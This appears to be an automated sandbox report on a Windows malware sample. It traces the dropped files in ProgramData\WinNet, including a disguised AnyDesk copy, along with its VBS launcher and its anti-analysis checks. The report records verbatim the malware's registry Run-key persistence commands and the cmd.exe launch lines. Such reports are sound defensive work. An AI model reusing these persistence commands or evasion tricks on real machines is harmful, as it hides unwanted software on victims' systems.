                                Source: Binary string: C:\b\s\w\ir\x\w\sdk\out\ReleaseX64\dart_precompiled_runtime_product.exe.pdb source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\app-32\win_app\win_app.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-32\win_dwm\win_dwm.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: SAS.pdbR source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-32\privacy_feature\privacy_feature.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.0000000003044000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\app-32\win_loader\AnyDesk.pdb source: AnyDesk.exe, 00000010.00000002.2886245081.0000000001473000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\b\s\w\ir\x\w\sdk\out\ReleaseX64\dart_precompiled_runtime_product.exe.pdbd source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                Source: C:\ProgramData\WinNet\AnyDesk.exeUnpacked PE file: 16.2.AnyDesk.exe.230000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: C:\ProgramData\WinNet\AnyDesk.exeUnpacked PE file: 19.2.AnyDesk.exe.230000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: C:\ProgramData\WinNet\AnyDesk.exeUnpacked PE file: 20.2.AnyDesk.exe.230000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: Yara matchFile source: SysrI6zSkJ.exe, type: SAMPLE
                                Source: Yara matchFile source: C:\ProgramData\WinNet\embedded.exe, type: DROPPED
                                Source: gg.exe.0.drStatic PE information: 0xAEA20DC3 [Sat Nov 4 08:52:19 2062 UTC]
                                Source: SysrI6zSkJ.exeStatic PE information: section name: _RDATA
                                Source: SysrI6zSkJ.exeStatic PE information: section name: snapshot
                                Source: embedded.exe.0.drStatic PE information: section name: _RDATA
                                Source: embedded.exe.0.drStatic PE information: section name: snapshot

                                Persistence and Installation Behavior

                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Process created: reg.exe
                                Source: C:\ProgramData\WinNet\embedded.exe Process created: reg.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe File created: C:\ProgramData\WinNet\embedded.exe
                                Source: C:\ProgramData\WinNet\AnyDesk.exe File created: C:\Users\user\AppData\Local\Temp\gcapi.dll
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe File created: C:\ProgramData\WinNet\gg.exe
                                Source: C:\ProgramData\WinNet\AnyDesk.exe File created: C:\ProgramData\WinNet\gcapi.dll
                                Source: C:\ProgramData\WinNet\embedded.exe File created: C:\ProgramData\WinNet\AnyDesk.exe
                                Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Repository

                                Hooking and other Techniques for Hiding and Protection

                                Source: C:\ProgramData\WinNet\AnyDesk.exe File opened: C:\ProgramData\WinNet\AnyDesk.exe:Zone.Identifier read attributes | delete
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C403B7 GetModuleHandleW, GetProcAddress (repeated), 19_2_69C403B7
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\embedded.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\ProgramData\WinNet\AnyDesk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
                                Source: C:\ProgramData\WinNet\gg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\ProgramData\WinNet\AnyDesk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive
                                Source: C:\ProgramData\WinNet\AnyDesk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT MACAddress FROM Win32_NetworkAdapter WHERE PhysicalAdapter = TRUE
                                Source: C:\ProgramData\WinNet\gg.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: 2A20000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: 2BD0000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: 2A40000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: 3080000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: 32B0000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: 3200000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: 1750000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: 30F0000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: 3040000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exe Thread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                                Source: C:\ProgramData\WinNet\gg.exe Window / User API: threadDelayed 1641
                                Source: C:\ProgramData\WinNet\gg.exe Window / User API: threadDelayed 2781
                                Source: C:\ProgramData\WinNet\gg.exe Window / User API: threadDelayed 2051
                                Source: C:\ProgramData\WinNet\gg.exe Window / User API: threadDelayed 4454
                                Source: C:\ProgramData\WinNet\gg.exe Window / User API: threadDelayed 1576
                                Source: C:\ProgramData\WinNet\gg.exe Window / User API: threadDelayed 4133
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gcapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Dropped PE file which has not been started: C:\ProgramData\WinNet\gcapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exe API coverage: 2.0 %
                                Source: C:\ProgramData\WinNet\gg.exe TID: 7468 Thread sleep time: -11990383647911201s >= -30000s
                                Source: C:\ProgramData\WinNet\gg.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 5776 Thread sleep time: -9223372036854770s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 6988 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 5776 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 7068 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\gg.exe TID: 6948 Thread sleep count: 2051 > 30
                                Source: C:\ProgramData\WinNet\gg.exe TID: 6948 Thread sleep count: 4454 > 30
                                Source: C:\ProgramData\WinNet\gg.exe TID: 7400 Thread sleep time: -21213755684765971s >= -30000s
                                Source: C:\ProgramData\WinNet\gg.exe TID: 6952 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 4416 Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 2504 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 6980 Thread sleep time: -30000s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 6640 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 4416 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\gg.exe TID: 7836 Thread sleep time: -11068046444225724s >= -30000s
                                Source: C:\ProgramData\WinNet\gg.exe TID: 7656 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
                                Source: C:\ProgramData\WinNet\gg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\AnyDesk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C5F147 GetLocalTime followed by cmp: cmp dx, 000ch and CTI: jbe 69C5F183h 19_2_69C5F147
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C3F1AA VirtualQuery,GetSystemInfo,19_2_69C3F1AA
                                Source: embedded.exe, 00000007.00000002.2882222148.000001A0B8B6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrrCP
                                Source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                                Source: AnyDesk.exe, 00000010.00000002.2888492265.0000000001D88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}00bo
                                Source: SysrI6zSkJ.exe, 00000000.00000002.2881984710.00000231D6D3C000.00000004.00000020.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1829531012.0000000006C37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
                                Source: C:\ProgramData\WinNet\gg.exe Process information queried: ProcessInformation
                                Source: C:\ProgramData\WinNet\gg.exe Code function: 18_2_065477A0 LdrInitializeThunk,18_2_065477A0
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C45F8C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_69C45F8C
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C49E6A mov eax, dword ptr fs:[00000030h] 19_2_69C49E6A
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C4B428 GetProcessHeap,19_2_69C4B428
                                Source: C:\ProgramData\WinNet\gg.exe Process token adjusted: Debug
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C40FC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_69C40FC3
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C414B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_69C414B2
                                Source: C:\ProgramData\WinNet\gg.exe Memory allocated: page read and write | page guard
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Process created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\embedded.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\WinNet\embedded.exe C:\ProgramData\WinNet\embedded.exe
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                Source: C:\ProgramData\WinNet\embedded.exe Process created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                Source: C:\ProgramData\WinNet\embedded.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\AnyDesk.exe
                                Source: C:\ProgramData\WinNet\embedded.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                Source: C:\Windows\System32\wscript.exe Process created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe"
                                Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\WinNet\AnyDesk.exe C:\ProgramData\WinNet\AnyDesk.exe
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C5F711 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_69C5F711
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C4168B cpuid 19_2_69C4168B
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: IsValidCodePage,GetLocaleInfoW,19_2_69C5AD29
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: EnumSystemLocalesW,19_2_69C4EC36
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: EnumSystemLocalesW,19_2_69C5AFB1
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: EnumSystemLocalesW,19_2_69C5AF66
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: GetLocaleInfoW,19_2_69C5AEBD
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: GetLocaleInfoW,19_2_69C4F15E
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_69C5B0D9
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: EnumSystemLocalesW,19_2_69C5B04C
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: GetLocaleInfoW,19_2_69C5B329
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW,GetLocaleInfoW,19_2_69C3D200
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: GetLocaleInfoW,19_2_69C5B559
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_69C5B452
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_69C5B626
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Queries volume information: C:\Users\user\Desktop\SysrI6zSkJ.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\ProgramData\WinNet\embedded.exe Queries volume information: C:\ProgramData\WinNet\embedded.exe VolumeInformation
                                Source: C:\ProgramData\WinNet\embedded.exe Queries volume information: C:\ProgramData\WinNet\gg.exe VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\ProgramData\WinNet\gg.exe VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\ProgramData\WinNet\AnyDesk.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\ProgramData\WinNet\gg.exe VolumeInformationJump to behavior
